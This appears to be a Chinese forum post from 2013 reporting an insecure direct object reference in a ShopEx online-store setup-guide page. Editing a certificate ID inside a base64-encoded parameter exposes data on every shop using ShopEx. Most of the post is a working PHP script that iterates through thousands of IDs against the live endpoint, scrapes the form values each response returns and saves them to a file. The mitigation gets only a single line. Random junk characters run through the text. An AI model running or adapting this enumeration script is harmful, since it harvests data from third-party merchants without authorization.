|
|
简要描述:
: x$ E/ u% s7 z6 W; xShopEx某接口缺陷,可遍历所有网站
6 e6 z0 g5 P# R6 i8 Z' G3 Y8 t详细说明:' S6 c/ q. |, l5 ~" f8 Q3 o8 S. u, W, v
问题出现在shopex 网店使用向导页面 ( q/ y# a( p! a, H
( k/ K. h; {& H# K. m
* [& \5 Y7 W3 U) U$ t
. p" p" C. J! F2 a# n) m0 Fhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=8 u/ l' J0 v( ?7 d
" U- z6 F8 b: o& s3 j: `1 y; p% Q2 s% |$ ?. z
# i$ v: @9 ]# P, E7 F# [$ l9 X/ Wrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 Q7 F& ~6 l4 H- m5 n: o1 `1 }, ?/ Z6 q8 N" s) ]! }
) M' u5 b+ y" z! e9 C4 r
& E$ D3 n! F$ p5 T% r! F# q我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 " `% ?* F0 P8 W9 q3 F8 _' m
+ |. _$ _- {, F3 W6 ?4 V
7 |: f( T1 A# ?3 j- F5 |! f+ V h5 b7 @
<?php- B8 {6 y( o: Q4 g! |3 M
# e! ~/ w( Z5 h+ g5 J, {; O for ($i=1; $i < 10000; $i++) { //遍历9 {- Z: ~" W& }% [
8 |( ?3 N7 ?! l; L9 H- Y, P8 _ ShowshopExD($i);. S J3 B% X# Y. m* i$ O
2 q3 n; e: Q- O9 }7 V/ d s
}& s$ e0 f1 I8 O$ k6 l/ h" E5 V
; a1 Y. K0 g8 N" v
function ShowshopExD($cid) {% S& w5 A; X, T8 x: Y! G- ?! U5 Q: ?
2 P7 N8 s" m- \+ b9 F# Q $url='http://guide.ecos.shopex.cn/step2.php';: f6 j* z- a. t7 u' W
/ J; g$ O- p: P# ] $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; C+ g7 s) r9 d7 n
2 Y' f3 a. t' Q" ]* K $url = $url.'?refer='.$refer;/ _; I- n: g% s9 F( N' h% h
- X2 J/ j" a' F. n8 c* F $ch = curl_init($url);- V: j) ~$ n3 Z
- u( E8 I2 Q! l! l; L2 @
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- r$ u+ b) F4 A' w* U
" t; }+ o8 }8 w6 ~3 M curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
+ {0 ]# U, v6 b( D T
& g' r2 Z" M( s" J3 y4 u! N0 X9 Q $result = curl_exec($ch);' \8 R9 s0 m; X
8 _! z7 o/ p2 b& |2 t $result = mb_convert_encoding($result, "gb2312", "UTF-8");5 Y7 D- _' R5 R3 h# y- n" @( F
" m" h1 W5 c: N1 a( K/ s2 Y, o
if(strpos($result,$refer))
/ j' s/ W" _5 q, O: U+ c( w2 A7 H D5 e! W7 f, }% K" x+ Y: s/ I G
{) Q+ F- o7 i/ F+ g- M# I" }; U; [* R: r
4 x5 L/ b5 C; l $fp = fopen("c:/shopEx.txt",'ab'); //保存文件" v# }& @+ H- Q& F$ @6 f' E
* ]$ Y" Q+ Y+ w: b
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);6 v( z0 m, E6 a$ o8 \
; u& b4 m6 ?) n( \, D
foreach ($value[1] as $key) {
8 f' ~$ U% p' G1 u9 K9 k6 H8 l) I7 |3 ]. k3 A, O4 M7 I
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
* y2 Y, ?' p- ^0 Y, D' u V7 `0 g. C \$ u z0 F( z4 N! e
echo $res[1][0].':'.$res[3][0]."\r\n";
' m7 A. p5 U0 U1 v: U4 R& d8 w7 w) M
$col =$res[1][0].':'.$res[3][0]."\r\n";
7 Q; J7 T, l3 T. b3 L0 V+ N! v- H+ \% U5 g# ] o
fwrite($fp, $col, strlen($col)); ' P3 H+ u- F; \7 a% p; K
$ @. s8 @2 ^! M6 M$ f& C2 k2 J4 R }
9 A3 p; p0 z& K. |
6 e8 @2 j3 A3 E0 k4 E' p4 x echo '--------------------------------'."\r\n";( X! A" v' s& A1 b, j
# r; e- M+ h" x fclose($fp);
1 _+ `/ o* f; B, m+ g) j
1 v$ b3 j: z$ F# { }% g0 W7 n& ~: X
/ w" L) h0 S( p3 S+ l flush();
% b$ o6 |% W# K% i
$ b) q8 {9 C* c' M8 T; H) p- ? curl_close($ch);
2 J$ ] N+ i0 P4 Z# M
! `' j& t1 \% T, {. [7 z( y) b2 m }: z8 U2 ?0 Y, \- n% {1 m5 F3 f
. Y4 ~4 a9 s( z* h
?>
7 @, v d0 y5 `漏洞证明:) [" h- j/ S2 C2 o/ Z8 u j
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg" `+ y2 ?+ [. [2 w
refer换成其他加密方式( [) g% c- V2 S/ `, P
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对